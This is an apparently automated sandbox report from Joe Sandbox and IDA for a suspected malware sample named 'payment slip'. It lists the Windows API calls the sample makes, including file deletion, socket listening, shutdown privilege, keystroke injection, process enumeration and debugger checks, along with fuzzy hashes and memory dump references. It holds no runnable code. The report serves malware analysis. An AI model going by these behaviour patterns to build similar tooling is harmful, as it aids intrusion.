                                        • Instruction Fuzzy Hash: 2731B2316406196AEF20EFF4EC48EEE77EC9F47321F144155E914A2191DF39DA85CB60
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 000A8257
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 000A8267
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000A8273
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000A8310
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8324
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8356
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 000A838C
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000A8395
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryTime$File$Local$System
                                        • String ID: *.*
                                        • API String ID: 1464919966-438819550
                                        • Opcode ID: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                        • Instruction ID: aadbab18307e877921e5c41c3b5c252d94dc07ad87232ce683931a1a60733ca7
                                        • Opcode Fuzzy Hash: 0ef0532712b5c6eccb4cf3f3ed78ec7233b18d2e9c64d58b5a85e3b213372632
                                        • Instruction Fuzzy Hash: 31616C725047459FDB10EF60C844EAEB3E8FF89314F04892EF98997252DB35EA45CB92
                                        APIs
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                          • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0009D122
                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0009D1DD
                                        • MoveFileW.KERNEL32(?,?), ref: 0009D1F0
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D20D
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D237
                                          • Part of subcall function 0009D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0009D21C,?,?), ref: 0009D2B2
                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0009D253
                                        • FindClose.KERNEL32(00000000), ref: 0009D264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 1946585618-1173974218
                                        • Opcode ID: 540b3e2f899dc20068ffc87381be7adbd53d70b4ca20fd9dc3cf1f58de0d3399
                                        • Instruction ID: 68a07b9260a803f0d34132b32ec99e1d497784ad96b3b4f0d6bac2e6f6d8aded
                                        • Opcode Fuzzy Hash: 540b3e2f899dc20068ffc87381be7adbd53d70b4ca20fd9dc3cf1f58de0d3399
                                        • Instruction Fuzzy Hash: FA617C3184510DABDF06EBE0DA92DEDB7B9AF55300F604166E442771A2EF30AF09DB60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                        • Instruction ID: 52fee5a0436d58109a5c7274bc8d4bda53593e9afb5465856b973b1530663c2c
                                        • Opcode Fuzzy Hash: 8248ba407ce21710e4b2e9a5cd115be54fabc7321bab07332ec3fd32fbeccd4b
                                        • Instruction Fuzzy Hash: A541CD35204651AFE720CF55D888F59BBE5FF45329F14C099E45A8BA62C739EC42CB90
                                        APIs
                                          • Part of subcall function 000916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                          • Part of subcall function 000916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                          • Part of subcall function 000916C3: GetLastError.KERNEL32 ref: 0009174A
                                        • ExitWindowsEx.USER32(?,00000000), ref: 0009E932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $ $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-3163812486
                                        • Opcode ID: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                        • Instruction ID: cc19a8983acc6c6d2992c43a49adc68e1682a102a79cc99b4026ab16e9c5d437
                                        • Opcode Fuzzy Hash: 14036c052c42ce5dff3ebdb2f75fc47c3824634b908285f7c8e8b04c5a1534b3
                                        • Instruction Fuzzy Hash: A501F972B10211AFFF64A7B4DC86FFF72ACA714750F150521FD13E21D2D9A55C40A190
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000B1276
                                        • WSAGetLastError.WSOCK32 ref: 000B1283
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000B12BA
                                        • WSAGetLastError.WSOCK32 ref: 000B12C5
                                        • closesocket.WSOCK32(00000000), ref: 000B12F4
                                        • listen.WSOCK32(00000000,00000005), ref: 000B1303
                                        • WSAGetLastError.WSOCK32 ref: 000B130D
                                        • closesocket.WSOCK32(00000000), ref: 000B133C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        • Opcode ID: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                        • Instruction ID: 5b8665cc20aae47c41514f0cb18bce74db9faca1c94caa50ca62f9064ff440aa
                                        • Opcode Fuzzy Hash: d4fb44a6566698b45baf2bb9b27843e11ed61ce2471419369e6e00cca60e6379
                                        • Instruction Fuzzy Hash: 91417271A001009FE710DF64C494FAABBE6AF46318F588198D85A9F293C775ED85CBE1
                                        APIs
                                        • _free.LIBCMT ref: 0006B9D4
                                        • _free.LIBCMT ref: 0006B9F8
                                        • _free.LIBCMT ref: 0006BB7F
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                        • _free.LIBCMT ref: 0006BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                        • String ID:
                                        • API String ID: 314583886-0
                                        • Opcode ID: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                        • Instruction ID: 58d61816519d85ce935f20488a3f1af2a1fc19c34e37f810c7d72307f5f58c60
                                        • Opcode Fuzzy Hash: 6420b776f03fd80f23a996dcb03f13f498a9602eba34a175c412b79c72c2e644
                                        • Instruction Fuzzy Hash: ADC106B1A04205AFDB249F78CC51AEE7BFBEF41350F2441AAE494D7252EB709E81CB50
                                        APIs
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                          • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                        • FindFirstFileW.KERNEL32(?,?), ref: 0009D420
                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0009D470
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0009D481
                                        • FindClose.KERNEL32(00000000), ref: 0009D498
                                        • FindClose.KERNEL32(00000000), ref: 0009D4A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 2649000838-1173974218
                                        • Opcode ID: 757d876ba7a1672c5d124a1564fa9ec4a0987ce8b922f3b715f7804fc8c1840b
                                        • Instruction ID: 090d73cf2960befda32fbb480a62d5f7a3204a30c38a7741a450837f80c5f10f
                                        • Opcode Fuzzy Hash: 757d876ba7a1672c5d124a1564fa9ec4a0987ce8b922f3b715f7804fc8c1840b
                                        • Instruction Fuzzy Hash: 76317C710483459BD701EF64D8918EFB7ECAF92310F444A1EF4D5921A2EB20AA09DB63
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                        • Instruction ID: cb51005c52b24984d30575d61d7a292c269593a44ef73ec8cee98cf77b3e3851
                                        • Opcode Fuzzy Hash: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                        • Instruction Fuzzy Hash: A5C24A71E086298FDB65CE28DD407EAB7F6EB48305F1441EAD84EE7241E774AE858F40
                                        APIs
                                        • _wcslen.LIBCMT ref: 000A64DC
                                        • CoInitialize.OLE32(00000000), ref: 000A6639
                                        • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A6650
                                        • CoUninitialize.OLE32 ref: 000A68D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                        • Instruction ID: a755369f84d5491f7ba026bce21061fa6cef6d1fa8dea5a07605ee30286083da
                                        • Opcode Fuzzy Hash: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                        • Instruction Fuzzy Hash: 13D16971508201AFD315EF64C881EABB7E8FF95304F04496DF5958B292EB71ED09CB92
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 000B22E8
                                          • Part of subcall function 000AE4EC: GetWindowRect.USER32(?,?), ref: 000AE504
                                        • GetDesktopWindow.USER32 ref: 000B2312
                                        • GetWindowRect.USER32(00000000), ref: 000B2319
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000B2355
                                        • GetCursorPos.USER32(?), ref: 000B2381
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000B23DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                        • Instruction ID: f6961c7161b0a8e59cb3a3178754536a94e0950b047ac11fd4dab9a4df171e76
                                        • Opcode Fuzzy Hash: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                        • Instruction Fuzzy Hash: 0731D072504315AFEB20DF54C849F9BB7E9FF88710F000A19F98997191DB35EA09CB92
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000A9B78
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000A9C8B
                                          • Part of subcall function 000A3874: GetInputState.USER32 ref: 000A38CB
                                          • Part of subcall function 000A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000A9BA8
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000A9C75
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                        • Instruction ID: f0e7e3bf6669153aa9e87861b77d67e6d30c823efee9c4c7c670f47e27be0657
                                        • Opcode Fuzzy Hash: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                        • Instruction Fuzzy Hash: D4418271A0460A9FDF55DFA4CD85EEEBBF8EF06310F248155E905A6192EB309E84CF60
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00049A4E
                                        • GetSysColor.USER32(0000000F), ref: 00049B23
                                        • SetBkColor.GDI32(?,00000000), ref: 00049B36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Color$LongProcWindow
                                        • String ID:
                                        • API String ID: 3131106179-0
                                        • Opcode ID: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                        • Instruction ID: b5f28a87c658d71f3e75c828daae8e0a27486c26938d81607ab5dd5660d5276a
                                        • Opcode Fuzzy Hash: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                        • Instruction Fuzzy Hash: 6EA13AF0108404BEE778BB2C8C48EBF36DDEB42350B254239F546D6A96CA25DD51C3BA
                                        APIs
                                          • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                          • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000B185D
                                        • WSAGetLastError.WSOCK32 ref: 000B1884
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000B18DB
                                        • WSAGetLastError.WSOCK32 ref: 000B18E6
                                        • closesocket.WSOCK32(00000000), ref: 000B1915
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                        • Instruction ID: c6f4e12f4ff35de1769cdcdb6063e8ee02445b1538d0e7144c7e13066591265a
                                        • Instruction Fuzzy Hash: 9851C8B5A002006FEB11AF24C896FAA77E5AF44718F54845CFA09AF3D3CB75AD41CB91
                                        APIs
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                        • Instruction ID: 37815dcc9fd267c7b3c9e21cf9a43a1d7ccac5de30655a3ee541405882940c53
                                        • Instruction Fuzzy Hash: E52180317402105FE7208F1AC884FAE7BE5AF96315F19806CE84A8B352C775DC42CB90
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        • Opcode ID: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                        • Instruction ID: b25fbd320c6b070b9df1cd388857161e1e38493ccc591583acc686938daf4fee
                                        • Instruction Fuzzy Hash: 75A28E70E0061ACBDF75CF58C8457EEB7B5BB44310F24C1A9E81AA7281EB759E81CB94
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000BA6AC
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 000BA6BA
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • Process32NextW.KERNEL32(00000000,?), ref: 000BA79C
                                        • CloseHandle.KERNEL32(00000000), ref: 000BA7AB
                                          • Part of subcall function 0004CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00073303,?), ref: 0004CE8A
                                        Similarity
                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                        • String ID:
                                        • API String ID: 1991900642-0
                                        • Opcode ID: 746de001eb987e725a49451e584cd2c470c396f76d80b4aec5016cdcd7494f9e
                                        • Instruction ID: fb2b02e498359e295122868607da3899b03e45c1556c59e0dfb1d3081c8c549e
                                        • Instruction Fuzzy Hash: E25160B1508301AFD710DF25C886EABBBE8FF89754F40892DF58997252EB71D904CB92
                                        APIs
                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0009AAAC
                                        • SetKeyboardState.USER32(00000080), ref: 0009AAC8
                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0009AB36
                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0009AB88
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                        • Instruction ID: 709c7c5738494f01ddce2079a20e8e3f67f2b4d746163255f78d8cca070c6f3b
                                        • Instruction Fuzzy Hash: DA311830B40208AFFF358B69CC05BFE7BE6AB46320F04421AF585561D2D7749981E7E2
                                        APIs
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 000ACE89
                                        • GetLastError.KERNEL32(?,00000000), ref: 000ACEEA
                                        • SetEvent.KERNEL32(?,?,00000000), ref: 000ACEFE
                                        Similarity
                                        • API ID: ErrorEventFileInternetLastRead
                                        • String ID:
                                        • API String ID: 234945975-0
                                        • Opcode ID: 32c2ebaa0356c557d6ea67c0015e919e236d843818d641087938e2bd89aeea68
                                        • Instruction ID: 3195a8257061a49819b6bc06c5f455b35058b98fc0a8b5f2c08c483d3dd7451e
                                        • Instruction Fuzzy Hash: B8218C71500705AFFB70DFA5C948FAB77F8EB41354F11442AE64692152E774EE08CB90
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000982AA
                                        Strings
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: cb2adeef69724bbdf48ec01441a4061d05323803aadcfc02b678af5a0c75ea32
                                        • Instruction ID: b9b2d131ab02e176b89267a87dd80ec98be62cdd15f6605baf76ee4fac305ed8
                                        • Instruction Fuzzy Hash: A5323475A006059FCB28CF59C481AAAB7F0FF48710B15C46EE59ADB3A1EB70E981DB44
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000A5CC1
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000A5D17
                                        • FindClose.KERNEL32(?), ref: 000A5D5F
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: d8ccf1dfa0e9b4658a59147b11eb2652cc7aa57bdcca395a30bde0f6c2809133
                                        • Instruction ID: 30072ae2b5cbaf2666bdd022af64befb43fe4669595e3e3c7a16aa8fa64d1f33
                                        • Instruction Fuzzy Hash: 9151AC74604A019FD724CF68C894E9AB7E4FF4A324F14855DE99A8B3A2CB30ED44CF91
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0006271A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00062724
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00062731
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                        • Instruction ID: 97fe67eae1f1bf861ec7cdf1b585daeb4403c1a61fcc078f99034e33c714ee5e
                                        • Instruction Fuzzy Hash: 0531C27490121CABDB21DF68DC89BDDBBF8AF08310F5041EAE80CA6261E7349F858F45
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A51DA
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5238
                                        • SetErrorMode.KERNEL32(00000000), ref: 000A52A1
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
